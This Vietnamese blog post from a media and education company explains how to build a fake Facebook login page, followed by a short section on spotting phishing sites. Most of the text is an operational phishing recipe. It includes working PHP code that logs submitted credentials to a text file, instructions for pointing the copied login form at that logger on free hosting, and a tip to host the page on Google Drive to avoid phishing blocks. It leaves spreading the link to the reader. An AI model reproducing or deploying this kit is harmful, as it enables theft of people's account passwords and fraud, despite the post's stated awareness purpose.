2020-06-18

Cách tạo một Website lấy Password FB

By Nhân Việt Media & Education - In Thủ Thuật Facebook

Cách tạo một Website lấy Password FB - Nhận biết và phòng tránh website lừa đảo.

Phishing là gì?
Phishing là một kỹ thuật tạo một trang Đăng nhập giả giống trang thật, khi bạn hoặc ai khác đăng nhập vào trang đó, thông tin đăng nhập của bạn bị đánh cắp. Trong bài viết này mình sẽ cho bạn thấy làm thế nào để tạo ra các trang đăng nhập Facebook giả mạo đơn giản. Mục đích không phải hướng dẫn bạn thành kể xấu đi đánh cắp thông tin người khác, mà cho bạn thấy người ta tạo nó như thế nào, cách nhận diện và phòng tránh được trang web lừa đảo.

I – Tạo một trang web lừa đảo giống trang Facebook.

Để thực hiện điều này bạn cần tạo 3 file sau :

1) .html
2) .php
3) .txt

Bước 1:
Mở 1 trang web mà bạn muốn tạo fake login page. Ở đây mình dùng facebook:
Click chuột fải và chọn xem nguồn trang ( view page source).

Hách ních facebook
 
Cách via ních facebook
Một tab mới hiện ra, bạn hãy bôi đen toàn bộ nội dung trog đó bằng cách sử dụng ctrl + A và copy & paste nó vào notepad, bạn có thể đùng Notepad ++, Tải xuống Tại đây.

Xóa dòng đầu tiên là   rồi save file notepad này lại thành "index.html". (Lưu tạm đó, bạn sẽ chỉnh sửa nó ở những bước tiếp theo.) 

cach-via-nich-facebook-don-gian
cach-via-nich-facebook-de-nhat
Bước 2:
Bạn mở notepad ra ra copy toàn bộ code ở dưới vào và save với tên là “login.php"
Code:

header ('Location: https://www.facebook.com  ');
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 
cach-via-nich-facebook-de-nhat
Bước 3:
Tạo ra tiếp 1 file notepage nữa đặt tên là  "pass.txt" rồi để đó.
cach-via-nich-facebook-de-nhat(1).jpg
 

Đến đây, chúng ta đã có 3 file cần thiết.

file-can-de-via-nich-facebook.jpg

Bước 4: Tiếp theo các bạn upload  2 file là login.php và pass.txt vừa tạo ở bước 2 và bước 3 lên 1 webhosting nào đó.
Ở đây mình dùng host miễn phí là : http://www.byethost.com hoặc hosting nào cũng được.
Các bạn phải đang kí thì mới úp được.

Sau khi đăng kí xong bạn vào mục  Online file manager, vào thư mục htdocs chọn upload và upload cả 2 file  là login.php và pass.txt vừa tạo xong vào lên host.
 

Quản lý hosting
 
Cài đặt hosting
Cài hosting
-----> Riêng file pass.txt bạn CHMOD nó là 777.
cai-dat-hosting-hach-facebook.jpg

Sau khi upload xong...File login.php của bạn sẽ có dạng

 "www.username-của-bạn.byethost??.com/login.php"

"www.username-của-bạn.byethost??.com/pass.txt"

(“www.username-của-bạn.byethost??.com” phần này nhà cung cấp host có gửi mail cho bạn khi bạn đăng kí host.)

Bước 5:Upload file index.html bạn vừa tạo ở bước 1 lên Google Drive.
( Thông thường bạn upload cả 3 file lên host là ok nhưng Hiện tại một số host có khả năng nhận diện Phishing và Block tài khoản nào úp Phishing nên Google Drive là lựa chọn tốt nhất để tạo hosting chứa Phishing mà không bị block link.)

Trước khi upload bạn cần Chỉnh sửa file index.html ở bước 1 như sau:

- Mở file index.html bằng Notepad, ấn Ctrl + F trong notepad và tìm từ "action", sau nó có dòng: https://www.facebook.com/login.php?login_attempt=1&lwv=110
bạn hãy xóa toàn bộ nội dung trong dấu "ngoặc kép" và thay vào đó là "www.username-của-bạn.byethost??.com/login.php"

("www.username-của-bạn.byethost??.com/login.php" là tên miền chứa file login.php của host mà bạn upload nó ở trên.)
 

Cài Login

Tiếp theo, bạn vào google drive tạo một thư mục, ở đây tôi tạo tên thư mục là host.

Upload file index.html lên thư mục host của google drive.

Cài Đặt Index

Chia sẻ file bạn vừa Upload như sau:

Cài Index
Lưu lại và copy đường dẫn file vào Notepage or Word,…
chia-se-google-driver.jpg
ảnh


Chú ý các kí tự trong giới hạn như hình ( ở đây màu đỏ).

Ví dụ: https://drive.google.com/file/d/0B7vTnwoYzqRlNS12LVZCOVlXZnM/view?usp=sharing

Copy lại và Pase nó sau https://googledrive.com/host/ thành

https://googledrive.com/host/0B7vTnwoYzqRlNS12LVZCOVlXZnM

Bước 5: Chép địa chỉ trên vào address của trinh duyệt của Chrome, Cốc Cốc, Firefox,… Để vào trang Fake của Facebook. Như vậy trang bạn vừa tạo giao diện không khác trang facebook.

phan-biet-trang-facebook-that-gia.jpg

Khi bạn điền thong tin và ấn đăng nhập, thông tin sẽ được chép vào file pass.txt mà bạn up trên host. Kiểm tra lại thì bạn vào file pass.txt  truy cập nhanh bằng cách gõ:
www.username-của-bạn.byethost??.com/pass.txt vào trình duyệt Chome, Cốc Cốc, Firefox,...

Cách lấy mật khẩu

Còn phát tán link web lừa đảo đến một ai đó là cách của bạn.

 II – Cách nhận diện và phòng tránh trang lừa đảo Phishing.

Nhận diện trang lừa đảo đơn giản nhất là xem địa chỉ trang địa chỉ trên thanh Address của trình duyệt web.

Trang web lừa đảo thường có tên miền dài hoặc khác với tên miền trang thật. Một số có thể gần giống nhau chỉ khác nhau vài kí tự .

Cách phân biệt trang thật giả

Đa số các trình duyệt web hiện nay điều có bảo mật nhận điện trang lừa đảo.
Khi bạn vào trang lừa đảo sẽ có thông báo như sau:

Bảo mật website

Nếu trình duyệt của bạn chưa bật bảo mật thì bật bảo mật.
Ví dụ trong Chrome vào Cài đặt:   “chrome://settings” , chọn Hiển thị cài đặt nâng cao. Chọn “ Bảo vệ bạn và thiết bị khỏi trang web nguy hiểm”.

Bảo mật facebook

Chúc bạn lướt web an toàn!

Cám ơn các bạn đã đọc và theo dõi Nhân Việt Media & Education.

Tag liên quan: cách đọc dữ liệu phân tích quảng cáo, Quảng cáo Facebook hiệu quả . xác minh doanh nghiệp trên facebook,..

Xem thêm nhiều dịch vụ của chúng tôi tại đây

Xem thêm clip về marketing tại đây: youtube.com/c/nhanvietmediaeducation


CÔNG TY TNHH TRUYỀN THÔNG & GIÁO DỤC NHÂN VIỆT

Trụ sở Hải Phòng: 20/22 Phố Trung Lăng - Khu 4 Thị Trấn Tiên Lãng - Huyện Tiên Lãng - Hải Phòng

Chi nhánh Hà Nội: Số 38, Ngõ 282, Khương Đình, Hạ Đình, Thanh Xuân, TP. Hà Nội

Hotline: 0964 639 819

Email: cskh@nhanvietmedia.edu.vn

Website: http://nhanvietmedia.com

Website: http://nhanvietmedia.edu.vn


 

Bài viết liên quan